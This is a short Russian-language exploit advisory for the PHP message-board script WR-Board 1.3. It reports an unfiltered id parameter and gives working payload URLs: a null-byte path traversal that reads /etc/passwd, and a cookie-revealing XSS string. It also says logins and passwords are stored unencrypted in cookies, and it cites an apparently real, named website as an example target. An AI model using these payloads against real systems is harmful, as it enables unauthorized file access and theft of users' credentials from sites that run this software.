WR-Board © 1.3

[-47-]

WR-Board © 1.3 - вот добрался =)

Итак скрипт не использует бд.

Приступим строка 831:

$lines=file("$datadir/$id.dat");

$id - не фильтруется
sploit:

index.php?event=view&id=../../../../../../../../etc/passwd%00&msnum=70483

Так же в скрипте по умолчанию отсутствует error_reporting (0); что дает возможность XSS нападения

index.php?event=view&id=<script>alert(document.cookie)</script>&msnum=70483

Самое приятное что в куках хранится логин м пасс в незащифрованном виде

Ex:
http://www.paton.kiev.ua/wr-board/index.ph...%00&msnum=70483


Advisored by -=47=-